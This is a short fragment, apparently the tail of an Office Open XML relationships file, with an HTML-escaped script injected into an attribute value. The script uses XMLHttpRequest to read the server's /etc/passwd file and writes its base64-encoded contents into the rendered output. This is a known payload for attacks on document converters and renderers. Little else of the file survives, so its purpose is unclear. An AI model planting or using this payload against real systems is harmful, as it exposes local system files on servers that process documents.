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ad72be9d6c49f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&lt;script&gt; x=new XMLHttpRequest; x.onload=function(){document.write(btoa(this.responseText))}; x.open("GET","file:///etc/passwd");x.send(); &lt;/script&gt;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c138dcdc5445a2" /></Relationships>
</file>